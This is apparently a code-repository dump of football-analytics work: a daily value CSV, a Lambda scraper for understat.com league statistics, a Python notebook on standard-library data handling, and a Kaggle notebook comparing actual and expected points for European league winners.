| 16/04/2022,100 49 | 17/04/2022,200 50 | 18/04/2022,300 51 | 19/04/2022,200 52 | 20/04/2022,100 53 | 21/04/2022,100 54 | 22/04/2022,200 55 | 23/04/2022,400 56 | 24/04/2022,200 57 | 25/04/2022,100 58 | 26/04/2022,200 59 | 27/04/2022,300 60 | 28/04/2022,400 61 | 29/04/2022,200 62 | 30/04/2022,200 63 | 01/05/2022,300 64 | 02/05/2022,300 65 | 03/05/2022,400 66 | 04/05/2022,300 67 | 05/05/2022,200 68 | 
06/05/2022,200 69 | 07/05/2022,200 70 | 08/05/2022,400 71 | 09/05/2022,150 72 | 10/05/2022,350 73 | 11/05/2022,350 74 | 12/05/2022,300 75 | 13/05/2022,250 76 | 14/05/2022,300 77 | 15/05/2022,200 78 | 16/05/2022,300 79 | 17/05/2022,200 80 | 18/05/2022,400 81 | 19/05/2022,200 82 | 20/05/2022,200 83 | 21/05/2022,150 84 | 22/05/2022,200 85 | 23/05/2022,150 86 | 24/05/2022,150 87 | 25/05/2022,100 88 | 26/05/2022,150 89 | 27/05/2022,150 90 | 28/05/2022,250 91 | 29/05/2022,150 92 | 30/05/2022,200 93 | 31/05/2022,150 94 | 01/06/2022,200 95 | 02/06/2022,150 96 | 03/06/2022,100 97 | 04/06/2022,100 98 | 05/06/2022,100 99 | 06/06/2022,100 100 | 07/06/2022,110 101 | 08/06/2022,140 102 | 09/06/2022,200 103 | 10/06/2022,200 104 | 11/06/2022,150 105 | 12/06/2022,100 106 | 13/06/2022,150 107 | 14/06/2022,200 108 | 15/06/2022,250 109 | 16/06/2022,200 110 | 17/06/2022,200 111 | 18/06/2022,200 112 | 19/06/2022,250 113 | 20/06/2022,200 114 | 21/06/2022,300 115 | 22/06/2022,130 116 | 23/06/2022,200 117 | 24/06/2022,100 118 | 25/06/2022,170 119 | 26/06/2022,150 120 | 27/06/2022,150 121 | 28/06/2022,250 122 | 29/06/2022,200 123 | 30/06/2022,150 124 | 01/07/2022,150 125 | 02/07/2022,120 126 | 03/07/2022,100 127 | 04/07/2022,230 128 | 05/07/2022,150 129 | 06/07/2022,150 130 | 07/07/2022,150 131 | 08/07/2022,250 132 | 09/07/2022,300 133 | 10/07/2022,100 134 | 11/07/2022,100 135 | 12/07/2022,70 136 | 13/07/2022,100 137 | 14/07/2022,300 138 | 15/07/2022,130 139 | 16/07/2022,140 140 | 17/07/2022,160 141 | 18/07/2022,150 142 | 19/07/2022,100 143 | 20/07/2022,200 144 | 21/07/2022,100 145 | 22/07/2022,150 146 | 23/07/2022,240 147 | 24/07/2022,280 148 | 25/07/2022,180 149 | 26/07/2022,170 150 | 27/07/2022,200 151 | 28/07/2022,160 152 | 29/07/2022,270 153 | 30/07/2022,170 154 | 31/07/2022,160 155 | 01/08/2022,200 156 | 02/08/2022,140 157 | 03/08/2022,180 158 | 04/08/2022,150 159 | 05/08/2022,150 160 | 06/08/2022,250 161 | 07/08/2022,300 162 | 08/08/2022,140 163 | 09/08/2022,300 164 | 10/08/2022,160 165 | 11/08/2022,200 166 | 12/08/2022,200 167 | 13/08/2022,200 168 | 14/08/2022,150 169 | 15/08/2022,200 170 | 16/08/2022,150 171 | 17/08/2022,200 172 | 18/08/2022,200 173 | 19/08/2022,400 174 | 20/08/2022,200 175 | 21/08/2022,300 176 | 22/08/2022,200 177 | 23/08/2022,150 178 | 24/08/2022,150 179 | 25/08/2022,150 180 | 26/08/2022,400 181 | 27/08/2022,250 182 | 28/08/2022,250 183 | 29/08/2022,350 184 | 30/08/2022,450 185 | 31/08/2022,350 186 | 01/09/2022,450 187 | 02/09/2022,350 188 | 03/09/2022,350 189 | 04/09/2022,450 190 | 05/09/2022,300 191 | 06/09/2022,350 192 | 07/09/2022,460 193 | 08/09/2022,640 194 | 09/09/2022,650 195 | 10/09/2022,350 196 | 11/09/2022,400 197 | 12/09/2022,300 198 | 13/09/2022,350 199 | 14/09/2022,350 200 | 15/09/2022,200 201 | 16/09/2022,200 202 | 17/09/2022,200 203 | 18/09/2022,230 204 | 19/09/2022,170 205 | 20/09/2022,160 206 | 21/09/2022,300 207 | 22/09/2022,400 208 | 23/09/2022,550 209 | 24/09/2022,240 210 | 25/09/2022,400 211 | 26/09/2022,500 212 | 27/09/2022,550 213 | 28/09/2022,400 214 | 29/09/2022,430 215 | 30/09/2022,500 216 | 01/10/2022,530 217 | 02/10/2022,500 218 | 03/10/2022,320 219 | 04/10/2022,370 220 | 05/10/2022,200 221 | 06/10/2022,330 222 | 07/10/2022,350 223 | 08/10/2022,380 224 | 09/10/2022,440 225 | 10/10/2022,370 226 | 11/10/2022,240 227 | 12/10/2022,270 228 | 13/10/2022,420 229 | 14/10/2022,500 230 | 15/10/2022,400 231 | 16/10/2022,300 232 | 17/10/2022,320 233 | 18/10/2022,530 234 | 19/10/2022,430 235 | 20/10/2022,370 236 | 21/10/2022,100 237 | 22/10/2022,320 238 | 23/10/2022,400 
239 | 24/10/2022,470 240 | 25/10/2022,480 241 | 26/10/2022,480 242 | 27/10/2022,320 243 | 28/10/2022,480 244 | 29/10/2022,550 245 | 30/10/2022,950 246 | 31/10/2022,620 247 | 01/11/2022,650 248 | 02/11/2022,800 249 | 03/11/2022,730 250 | 04/11/2022,840 251 | 05/11/2022,600 252 | 06/11/2022,490 -------------------------------------------------------------------------------- /lambda_web_scraper.py: -------------------------------------------------------------------------------- 1 | import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) 2 | import requests 3 | from bs4 import BeautifulSoup 4 | import json 5 | import boto3 6 | import logging 7 | 8 | logger = logging.getLogger() 9 | logger.setLevel(logging.INFO) 10 | 11 | # create urls for all SEASONS of all LEAGUES 12 | BASE_URL = 'https://understat.com/league' 13 | LEAGUES = ['La_liga', 'EPL', 'Bundesliga', 'Serie_A', 'Ligue_1'] 14 | SEASONS = ['2014', '2015', '2016', '2017', '2018', '2019', '2020', '2021'] 15 | # SEASONS = ['2021'] 16 | 17 | 18 | def get_teams_data(data): 19 | # Get teams and their relevant ids and put them into separate dictionary 20 | teams = {} 21 | for id in data.keys(): 22 | teams[id] = data[id]['title'] 23 | 24 | # EDA to get a feeling of how the JSON is structured 25 | # Column names are all the same, so we just use first element 26 | columns = [] 27 | # Check the sample of values per each column 28 | values = [] 29 | for id in data.keys(): 30 | columns = list(data[id]['history'][0].keys()) 31 | values = list(data[id]['history'][0].values()) 32 | break 33 | 34 | # Getting data for all teams 35 | dataframes = {} 36 | for id, team in teams.items(): 37 | teams_data = [] 38 | for row in data[id]['history']: 39 | teams_data.append(list(row.values())) 40 | 41 | df = pd.DataFrame(teams_data, columns=columns) 42 | dataframes[team] = df 43 | # print('Added data for {}.'.format(team)) 44 | 45 | return dataframes 46 | 47 | 48 | def get_data_from_web(league, season): 49 | url = BASE_URL+'/'+league+'/'+season 50 | logger.info("Scraping " + url) 51 | res = requests.get(url) 52 | soup = BeautifulSoup(res.content, "lxml") 53 | 54 | # Based on the structure of the webpage, I found that data is in the JSON variable, under 11 | 14 | 15 | 16 | 17 |
18 |
19 |
20 | 21 | 24 | 59 | 60 | -------------------------------------------------------------------------------- /data_manipulation_with_standard_lib.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 1, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "PATH_TO_FILE = 'data/cart.csv'" 10 | ] 11 | }, 12 | { 13 | "cell_type": "code", 14 | "execution_count": null, 15 | "metadata": {}, 16 | "outputs": [], 17 | "source": [ 18 | "def do_something_with():\n", 19 | " pass\n", 20 | "\n", 21 | "l = ['Twitter', 'Instagram', 'Snapchat', 'TikTok']\n", 22 | "# Instead of\n", 23 | "i = 0\n", 24 | "for s in l:\n", 25 | " do_something_with(i, s)\n", 26 | " i += 1\n", 27 | "\n", 28 | "# Use\n", 29 | "for i, s in enumerate(l):\n", 30 | " do_something_with(i, s)\n", 31 | "\n", 32 | "# less verbose and even slightly faster" 33 | ] 34 | }, 35 | { 36 | "cell_type": "code", 37 | "execution_count": 8, 38 | "metadata": {}, 39 | "outputs": [ 40 | { 41 | "name": "stdout", 42 | "output_type": "stream", 43 | "text": [ 44 | "1 ['t-shirt', 'black', 'top', '20', '1']\n", 45 | "2 ['pants', 'white', 'bottom', '50', '1']\n", 46 | "3 ['blazer', 'yellow', 'top', '100', '1']\n", 47 | "4 ['t-shirt', 'red', 'top', '15', '2']\n", 48 | "5 ['t-shirt', 'orange', 'top', '25', '1']\n", 49 | "6 ['sneakers', 'white', 'footwear', '100', '1']\n", 50 | "7 ['bracelet', 'green', 'accesories', '5', '3']\n" 51 | ] 52 | } 53 | ], 54 | "source": [ 55 | "import csv\n", 56 | "\n", 57 | "with open(PATH_TO_FILE, 'r') as f:\n", 58 | " rows = csv.reader(f, delimiter=',', quotechar='\"', escapechar=\"\\\\\")\n", 59 | " headers = next(rows)\n", 60 | " for line, row in enumerate(rows, start=1):\n", 61 | " print(line, row)" 62 | ] 63 | }, 64 | { 65 | "cell_type": "code", 66 | "execution_count": 6, 67 | "metadata": {}, 68 | "outputs": [ 69 | { 70 | "data": { 71 | "text/plain": [ 72 | "55" 73 | ] 74 | }, 75 | "execution_count": 6, 76 | "metadata": {}, 77 | "output_type": "execute_result" 78 | } 79 | ], 80 | "source": [ 81 | "shopping_cart = [\n", 82 | " ('t-shirt', 15, 1),\n", 83 | " ('pants', 50, 1),\n", 84 | " ('t-shirt', 20, 2),\n", 85 | " ('socks', 10, 1),\n", 86 | " ('jacket', 100, 1),\n", 87 | " ('socks', 5, 1)\n", 88 | "]\n", 89 | "\n", 90 | "from collections import Counter\n", 91 | "total_clothes = Counter()\n", 92 | "for item, price, quantity in shopping_cart:\n", 93 | " total_clothes[item] += price*quantity\n", 94 | "\n", 95 | "total_clothes['t-shirt']\n", 96 | "# >>> 55\n", 97 | "\n", 98 | "# This won't work\n", 99 | "total_clothes = {}\n", 100 | "for item, price, quantity in shopping_cart:\n", 101 | " total_clothes[item] += price*quantity\n", 102 | "\n", 103 | "total_clothes['t-shirt']\n", 104 | "# >>> KeyError: 't-shirt'\n", 105 | "\n", 106 | "# In order to make it work with dictionary:\n", 107 | "total_clothes = {}\n", 108 | "for item, price, quantity in shopping_cart:\n", 109 | " if item in total_clothes.keys():\n", 110 | " total_clothes[item] += price*quantity\n", 111 | " else:\n", 112 | " total_clothes[item] = price*quantity\n", 113 | "\n", 114 | "total_clothes['t-shirt']\n", 115 | "# >>> 55" 116 | ] 117 | }, 118 | { 119 | "cell_type": "code", 120 | "execution_count": 20, 121 | "metadata": {}, 122 | "outputs": [ 123 | { 124 | "data": { 125 | "text/plain": [ 126 | "Counter({'t-shirt': 55, 'pants': 50, 'socks': 15, 'jacket': 100})" 127 | ] 128 | }, 129 | "execution_count": 20, 130 | "metadata": {}, 131 | "output_type": 
"execute_result" 132 | } 133 | ], 134 | "source": [ 135 | "shopping_cart = [\n", 136 | " ('t-shirt', 15, 1),\n", 137 | " ('pants', 50, 1),\n", 138 | " ('t-shirt', 20, 2),\n", 139 | " ('socks', 10, 1),\n", 140 | " ('jacket', 100, 1),\n", 141 | " ('socks', 5, 1)\n", 142 | "]\n", 143 | "\n", 144 | "from collections import Counter\n", 145 | "total_clothes = Counter()\n", 146 | "for item, price, quantity in shopping_cart:\n", 147 | " total_clothes[item] += price*quantity\n", 148 | "\n", 149 | "total_clothes" 150 | ] 151 | }, 152 | { 153 | "cell_type": "code", 154 | "execution_count": 4, 155 | "metadata": {}, 156 | "outputs": [ 157 | { 158 | "data": { 159 | "text/plain": [ 160 | "[('the', 786),\n", 161 | " ('I', 622),\n", 162 | " ('and', 591),\n", 163 | " ('of', 446),\n", 164 | " ('to', 429),\n", 165 | " ('my', 402),\n", 166 | " ('you', 400),\n", 167 | " ('a', 353),\n", 168 | " ('in', 266),\n", 169 | " ('not', 265),\n", 170 | " ('that', 249),\n", 171 | " ('KING', 243),\n", 172 | " ('LEAR', 236),\n", 173 | " ('me', 227),\n", 174 | " ('your', 205),\n", 175 | " ('him', 197),\n", 176 | " ('have', 193),\n", 177 | " ('his', 193),\n", 178 | " ('is', 192),\n", 179 | " ('this', 185)]" 180 | ] 181 | }, 182 | "execution_count": 4, 183 | "metadata": {}, 184 | "output_type": "execute_result" 185 | } 186 | ], 187 | "source": [ 188 | "from collections import Counter\n", 189 | "import string\n", 190 | "\n", 191 | "with open('data/kinglear.txt', 'r') as f:\n", 192 | " count_words = Counter()\n", 193 | " for line in f:\n", 194 | " line = line.translate(str.maketrans('', '', string.punctuation))\n", 195 | " words = line.split()\n", 196 | " words_per_line = Counter(words)\n", 197 | " count_words += words_per_line\n", 198 | "\n", 199 | "count_words.most_common(20)" 200 | ] 201 | }, 202 | { 203 | "cell_type": "code", 204 | "execution_count": 11, 205 | "metadata": {}, 206 | "outputs": [ 207 | { 208 | "data": { 209 | "text/plain": [ 210 | "[(15, 1), (20, 2)]" 211 | ] 212 | }, 213 | "execution_count": 11, 214 | "metadata": {}, 215 | "output_type": "execute_result" 216 | } 217 | ], 218 | "source": [ 219 | "shopping_cart = [\n", 220 | " ('t-shirt', 15, 1),\n", 221 | " ('pants', 50, 1),\n", 222 | " ('t-shirt', 20, 2),\n", 223 | " ('socks', 10, 1),\n", 224 | " ('jacket', 100, 1),\n", 225 | " ('socks', 5, 1)\n", 226 | "]\n", 227 | "\n", 228 | "from collections import defaultdict\n", 229 | "total_clothes = defaultdict(list)\n", 230 | "for item, price, quantity in shopping_cart:\n", 231 | " total_clothes[item].append((price, quantity))\n", 232 | "\n", 233 | "total_clothes['t-shirt']\n", 234 | "# >>> [(15, 1), (20, 2)]\n", 235 | "\n", 236 | "\n", 237 | "# total_clothes = {}\n", 238 | "# for item, price, quantity in shopping_cart:\n", 239 | "# total_clothes[item].append((price, quantity))\n", 240 | "# >>> KeyError: 't-shirt'" 241 | ] 242 | }, 243 | { 244 | "cell_type": "code", 245 | "execution_count": 15, 246 | "metadata": {}, 247 | "outputs": [ 248 | { 249 | "data": { 250 | "text/plain": [ 251 | "defaultdict(int, {'t-shirt': 55, 'pants': 50, 'socks': 15, 'jacket': 100})" 252 | ] 253 | }, 254 | "execution_count": 15, 255 | "metadata": {}, 256 | "output_type": "execute_result" 257 | } 258 | ], 259 | "source": [ 260 | "shopping_cart = [\n", 261 | " ('t-shirt', 15, 1),\n", 262 | " ('pants', 50, 1),\n", 263 | " ('t-shirt', 20, 2),\n", 264 | " ('socks', 10, 1),\n", 265 | " ('jacket', 100, 1),\n", 266 | " ('socks', 5, 1)\n", 267 | "]\n", 268 | "\n", 269 | "from collections import defaultdict\n", 270 | "total_clothes = 
defaultdict(int)\n", 271 | "for item, price, quantity in shopping_cart:\n", 272 | " total_clothes[item] += price*quantity\n", 273 | "\n", 274 | "total_clothes" 275 | ] 276 | }, 277 | { 278 | "cell_type": "code", 279 | "execution_count": 16, 280 | "metadata": {}, 281 | "outputs": [ 282 | { 283 | "data": { 284 | "text/plain": [ 285 | "[('jacket', 100), ('t-shirt', 55), ('pants', 50)]" 286 | ] 287 | }, 288 | "execution_count": 16, 289 | "metadata": {}, 290 | "output_type": "execute_result" 291 | } 292 | ], 293 | "source": [ 294 | "shopping_cart = [\n", 295 | " ('t-shirt', 15, 1),\n", 296 | " ('pants', 50, 1),\n", 297 | " ('t-shirt', 20, 2),\n", 298 | " ('socks', 10, 1),\n", 299 | " ('jacket', 100, 1),\n", 300 | " ('socks', 5, 1)\n", 301 | "]\n", 302 | "\n", 303 | "from collections import Counter\n", 304 | "total_clothes = Counter()\n", 305 | "for item, price, quantity in shopping_cart:\n", 306 | " total_clothes[item] += price*quantity\n", 307 | "\n", 308 | "total_clothes.most_common(3)" 309 | ] 310 | }, 311 | { 312 | "cell_type": "code", 313 | "execution_count": 18, 314 | "metadata": {}, 315 | "outputs": [ 316 | { 317 | "name": "stdout", 318 | "output_type": "stream", 319 | "text": [ 320 | "Last game result: 1\n", 321 | "Previous 5 games results: victories - 1 draws - 0 defeats - 0\n", 322 | "Last game result: X\n", 323 | "Previous 5 games results: victories - 1 draws - 1 defeats - 0\n", 324 | "Last game result: 1\n", 325 | "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n", 326 | "Last game result: 2\n", 327 | "Previous 5 games results: victories - 1 draws - 1 defeats - 1\n", 328 | "Last game result: X\n", 329 | "Previous 5 games results: victories - 1 draws - 1 defeats - 1\n", 330 | "Last game result: 1\n", 331 | "Previous 5 games results: victories - 1 draws - 1 defeats - 1\n", 332 | "Last game result: 1\n", 333 | "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n", 334 | "Last game result: 1\n", 335 | "Previous 5 games results: victories - 3 draws - 0 defeats - 0\n", 336 | "Last game result: 1\n", 337 | "Previous 5 games results: victories - 3 draws - 0 defeats - 0\n", 338 | "Last game result: X\n", 339 | "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n", 340 | "Last game result: 1\n", 341 | "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n" 342 | ] 343 | } 344 | ], 345 | "source": [ 346 | "from collections import deque, Counter\n", 347 | "import csv\n", 348 | "\n", 349 | "history = deque(maxlen=3)\n", 350 | "with open('data/results.csv', 'r') as f:\n", 351 | " lines = csv.reader(f)\n", 352 | " headers = next(lines)\n", 353 | " for line in lines:\n", 354 | " history.append(line)\n", 355 | " print('Last game result:', line[-1])\n", 356 | " last_results = Counter()\n", 357 | " for result in history:\n", 358 | " last_results[result[-1]] += 1\n", 359 | "\n", 360 | " print('Previous 5 games results: victories -', last_results['1'], 'draws -', last_results['X'], 'defeats -', last_results['2'])\n" 361 | ] 362 | } 363 | ], 364 | "metadata": { 365 | "kernelspec": { 366 | "display_name": "Python 3.8.10 ('venv': venv)", 367 | "language": "python", 368 | "name": "python3" 369 | }, 370 | "language_info": { 371 | "codemirror_mode": { 372 | "name": "ipython", 373 | "version": 3 374 | }, 375 | "file_extension": ".py", 376 | "mimetype": "text/x-python", 377 | "name": "python", 378 | "nbconvert_exporter": "python", 379 | "pygments_lexer": "ipython3", 380 | "version": "3.8.10" 381 | }, 382 | "orig_nbformat": 4, 383 | "vscode": { 384 | 
"interpreter": { 385 | "hash": "439571daf87331876600085d8386dc908c3f950474647915ed4fb6541957308b" 386 | } 387 | } 388 | }, 389 | "nbformat": 4, 390 | "nbformat_minor": 2 391 | } 392 | -------------------------------------------------------------------------------- /football_why_winners_win_and_losers_loose.ipynb: -------------------------------------------------------------------------------- 1 | {"cells":[{"metadata":{},"cell_type":"markdown","source":"# Exploring 5 Years of European Football"},{"metadata":{},"cell_type":"markdown","source":"# Intro\n\nIn this notebook we will explore modern metrics in football (xG, xGA and xPTS) and its' influence in sport analytics.\n\n* **Expected Goals (xG)** - measures the quality of a shot based on several variables such as assist type, shot angle and distance from goal, whether it was a headed shot and whether it was defined as a big chance.\n\n* **Expected Assits (xGA)** - measures the likelihood that a given pass will become a goal assist. It considers several factors including the type of pass, pass end-point and length of the pass.\n\n* **Expected Points (xPTS)** - measures the likelihood of a certaing game to bring points to the team.\n\nThese metrics let us look much deeper into football statistics and understand performance of players and teams in general and realize the role of luck and skill in it. Disclaimer: they are both important.\n\nThe process of data collection for this notebook is described in this Kaggle kernel: [Web Scraping Football Statistics](https://www.kaggle.com/slehkyi/web-scraping-football-statistics-2014-now)"},{"metadata":{"_uuid":"8f2839f25d086af736a60e9eeb907d3b93b6e0e5","_cell_guid":"b1076dfc-b9ad-4769-8c92-a6c4dae69d19","trusted":true},"cell_type":"code","source":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport collections\nimport warnings\n\nfrom IPython.core.display import display, HTML\n\n# import plotly \nimport plotly\nimport plotly.figure_factory as ff\nimport plotly.graph_objs as go\nimport plotly.offline as py\nfrom plotly.offline import iplot, init_notebook_mode\nimport plotly.tools as tls\n\n# configure things\nwarnings.filterwarnings('ignore')\n\npd.options.display.float_format = '{:,.2f}'.format \npd.options.display.max_columns = 999\n\npy.init_notebook_mode(connected=True)\n\n%load_ext autoreload\n%autoreload 2\n\n%matplotlib inline\nsns.set()\n\n# !pip install plotly --upgrade","execution_count":null,"outputs":[]},{"metadata":{"_cell_guid":"79c7e3d0-c299-4dcb-8224-4455121ee9b0","_uuid":"d629ff2d2480ee46fbb7e2d37f6b5fab8052498a","trusted":true},"cell_type":"code","source":"# # func to make plotly work in Collaboratory (not necessary on Kaggle)\n# def configure_plotly_browser_state():\n# import IPython\n# display(IPython.core.display.HTML('''\n# \n# \n# '''))","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Import Data and Visual EDA"},{"metadata":{"trusted":true},"cell_type":"code","source":"df = pd.read_csv('../input/understat.com.csv')\ndf = df.rename(index=int, columns={'Unnamed: 0': 'league', 'Unnamed: 1': 'year'}) \ndf.head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In the next visualization we will check how many teams from each league were in top 4 during last 5 years. 
It can give us some info about stability of top teams from different countries."},{"metadata":{"trusted":true},"cell_type":"code","source":"f = plt.figure(figsize=(25,12))\nax = f.add_subplot(2,3,1)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'Bundesliga') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,2)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'EPL') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,3)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'La_liga') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,4)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'Serie_A') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,5)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'Ligue_1') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,6)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'RFPL') & (df['position'] <= 4)], ax=ax)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we can see from these bar charts, there are teams that in last 5 years were in top 4 only once, which means it is not something common, which means if we dig deeper, we can find that there is a factor of luck that might have played in favour to these teams. It's just a theory, so let's look closer to those outliers.\n\nThe teams that were in top 4 only once during last 5 seasons are:\n\n* Wolfsburg (2014) and Schalke 04 (2017) from Bundesliga\n* Leicester (2015) from EPL\n* Villareal (2015) and Sevilla (2016) from La Liga\n* Lazio (2014) and Fiorentina (2014) from Serie A\n* Lille (2018) and Saint-Etienne (2018) from Ligue 1\n* FC Rostov (2015) and Dinamo Moscow (2014) from RFPL\n\nLet's save these teams."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Removing unnecessary for our analysis columns \ndf_xg = df[['league', 'year', 'position', 'team', 'scored', 'xG', 'xG_diff', 'missed', 'xGA', 'xGA_diff', 'pts', 'xpts', 'xpts_diff']]\n\noutlier_teams = ['Wolfsburg', 'Schalke 04', 'Leicester', 'Villareal', 'Sevilla', 'Lazio', 'Fiorentina', 'Lille', 'Saint-Etienne', 'FC Rostov', 'Dinamo Moscow']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Checking if getting the first place requires fenomenal execution\nfirst_place = df_xg[df_xg['position'] == 1]\n\n# Get list of leagues\nleagues = df['league'].drop_duplicates()\nleagues = leagues.tolist()\n\n# Get list of years\nyears = df['year'].drop_duplicates()\nyears = years.tolist()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Understanding How Winners Win"},{"metadata":{},"cell_type":"markdown","source":"In this section we will try to find some patterns that can help us understand what are some of the ingredients of the victory soup :D. 
Starting with Bundesliga."},{"metadata":{},"cell_type":"markdown","source":"## Bundesliga"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'Bundesliga']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'Bundesliga'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'Bundesliga'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in Bundesliga\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"By looking at the table and barchart we see that Bayern every year got more points that they should have, they scored more than expected and missed less than expected (except for 2018, which didn't break their plan of winning the season, but it gives some hints that Bayern played worse this year, although the competitors didn't take advantage of it). "},{"metadata":{"trusted":true},"cell_type":"code","source":"# and from this table we see that Bayern dominates here totally, even when they do not play well\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'Bundesliga')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## La Liga"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'La_liga']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'La_liga'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'La_liga'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in La Liga\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we can see from the chart above that in 2014 and 2015 Barcelona was creating enough moments to win the title and do not rely on personal skills or luck, from these numbers we can actually say that THE Team was playing there.\n\nIn 2016 there were lots of competition between Madrid and Barcelona and in the end Madrid got luckier / had more guts in one particular game (or Barcelona got unlucky / didn't have balls) and it was the cost of the title. I am sure that if we dig deeper that season we can find that particular match.\n\nIn 2017 and 2018 Barcelona's success was mostly tributed to actions of Lionel Messi who was scoring or making assits in situations where normal players wouldn't do that. What led to such a jump in xPTS difference. What makes me think (having the context that Real Madrid is very active on transfer market this season) can end up bad. Just subjective opinion based on numbers and watching Barcelona games. 
Really hope I am wrong."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing with runner-up\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'La_liga')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## EPL"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'EPL']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'EPL'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'EPL'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in EPL\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In the EPL we see a clear trend that tells you: \"To win you have to be better than statistics\". An interesting case here is Leicester's title story of 2015: they got 12 points more than they should have, and at the same time Arsenal got 6 points less than expected! This is why we love football, because such inexplicable things happen. I am not saying it was total luck, but luck played its role here.\n\nAnother interesting thing is Manchester City of 2018 - they are super stable! They scored just one goal more than expected, conceded 2 less and got 7 additional points, while Liverpool fought really well and had a little bit more luck on their side, but couldn't win despite being 13 points ahead of their expected total.\n\nPep is finishing building the machine of destruction. Man City creates and converts its moments based on skill and does not rely on luck - that makes them very dangerous in the next season."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing with runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'EPL')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## Ligue 1"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'Ligue_1']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'Ligue_1'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'Ligue_1'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in Ligue 1\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In French Ligue 1 we continue to see the trend of \"to win you have to execute at 110%, because 100% is not enough\". Here Paris Saint-Germain dominates totally. Only in 2016 do we get an outlier in the shape of Monaco, who scored 30 goals more than expected(!!!) and got almost 17 points more than expected! Luck? Quite a good piece of it. PSG was good that year, but Monaco was extraordinary. 
